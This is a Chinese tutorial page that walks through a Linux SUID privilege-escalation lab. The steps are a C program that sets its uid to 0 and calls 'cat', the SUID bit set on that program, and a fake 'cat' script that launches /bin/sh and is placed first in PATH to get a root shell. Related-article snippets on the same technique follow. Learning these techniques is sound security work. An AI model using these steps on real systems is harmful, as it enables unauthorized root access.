Linux----SUID提权复现
Linux系统提权
使用useradd命令,创建一个普通用户demo
useradd -m demo
useradd 的-m选项是在/home目录下创建demo用户的家目录。
确认用户是否创建成功
cat /etc/passwd
在/etc/passwd文件末尾的第一个字段出现用户名demo,则创建用户成功。
切换到/home/demo目录下,创建exp.c文件
cd /home/demo
touch exp.c
编写exp
vim exp.c
#include<stdlib.h>
#include<unistd.h>
int main()
{setuid(0);//设置用户id为0setgid(0);//设置用户组id为0system("cat");return 0;
}
使用gcc编译exp.c生成可执行文件exp
gcc exp.c -o exp
给exp赋予SUID权限
chmod u+s exp
-rws中的s代表SUID权限
切换到普通用户demo
su - demo
其中美元符$代表是普通用户,所以接下来要劫持环境变量,进行提权。
exp.c的system函数调用了cat脚本,所以要编写一个cat脚本。
touch cat
vi cat
#cat文件
/bin/sh
/bin/sh是新建一个shell终端
#赋予可执行权限
chmod u+x cat
echo $PATH
linux执行一个脚本或可执行文件时,会通过PATH存储的路径依次查找。因为已经有内置命令cat在/bin目录中了,所以要劫持环境变量。
将当前路径添加到PATH中,当前路径是"."
PATH=.:$PATH
运行exp文件(提权)
./exp
最后,普通用户成功提权为root用户。
Linux----SUID提权复现相关推荐
- linux suid提权
SUID是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行 时,使调用者暂时获得该文件拥有者的权限.也就是如果ROOT用户给某个可执行文件加了S权限,那么 该执行程 ...
- linux——SUID提权
一.Linux之特殊权限--SUID Linux的文件操作除了普通的读 (r).写(w).执行(x)权限外,还有一些特殊的权限.但都可以使用chmod和chown命令来设置.他们分别是SUID.SGI ...
- linux suid提权原理,Linux SUID提权
概述 find Nmap less bash vim 概述 SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限,如果拥有SUID权限,那么就可以利用 ...
- linux suid提权原理,Linux SUID、SGID、sticky提权
S UID SGID SOID 核心就在 "S" ,S就是允许本圈子 用户有r,w,x ; 例如:1.chmod s+g test.txt 只允许testex.txt所在的组 员可 ...
- linux suid提权原理,linux关于suid提权笔记
suid全称是Set owner User ID up on execution.这是Linux给可执行文件的一个属性,上述情况下,普通用户之所以也可以使用ping命令,原因就在我们给ping这个可执 ...
- 一文让你深刻理解什么是suid提权
一.课时目标 1.理解suid的概念和作用 2.掌握linux suid提权的方法 二.思考 思考: shadow文件存放用户密码,那普通用户在没有写权限的情况下如何修改密码并更新shadow文件中的 ...
- 【CVE-2021-4043】Linux本地提权漏洞复现
实验步骤 文章目录 实验步骤 CVE-2021-4043 Linux本地提权漏洞 实验背景 实验环境 漏洞复现 构造payload 用gcc编译后上传到阿里云 执行payload 漏洞修复 CVE-2 ...
- Linux中suid提权
一.原理: 设置了SUID的文件可以让调用者在调用该文件时以文件拥有者的身份运行该文件,所以利用SUID提权的原理就是运行拥有者为root并设置了SUID的文件,那么我们运行该文件的时候就得获得roo ...
- 《WEB安全渗透测试》(27)Linux系统提权-SUID提权
1.SUID提权介绍 提权,网络术语,指的是提高自己在服务器中的权限,如从普通用户提高到root用户,当网站被入侵后,攻击者会千方百计的去提高自己的权限,毕竟普通用户能干的事情太有限了. linux中 ...
- Linux提权之Suid提权 小部分归纳
Linux提权之Suid提权 SUID是linux的一种权限机制 具有这种权限的文件会在其执行的时候,使调用者暂时获得该文件拥有者的权限.如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进 ...
最新文章
- 优化javaScript代码,提高执行效率
- 经典类与新式类的继承顺序
- oracle buffer block,8 Oracle深度学习笔记——BUFFER CACHE深入一
- mysql增删改查 工具类_Hibernate增删改查数据库之二工具类
- matlab must agree,EEMD遇到Inner matrix dimensions must agree.
- React Native 圆形进度条组件
- Linux 实用工具vi
- Java程序设计(面向对象)- 基本概念
- 启动Hadoop集群,出现Cannot set priority of nodemanager(resourcemanager) process xxx问题
- 广东省计算机一级网络题分值,计算机一级考试分值分布
- GHOST XP SP2 遐想网络 专用加强版
- BNNVGG3-BNN Net
- 手机双清,三清,四清,五清,六清介绍
- 宽带连接怎么修改服务器名称地址,宽带连接怎么修改服务器名称地址
- htc系统Android 7.1,HTC太强大,被誉为刷机之王,一路升到安卓7
- 甲流疫苗“不良反应” adverse reaction
- 《中国历代政治得失》读书笔记
- 看到自己的朋友圈,我和我的小伙伴都惊呆了
- 在天津参加室内设计培训到底需要多少钱!!!
- Vue教程,React教程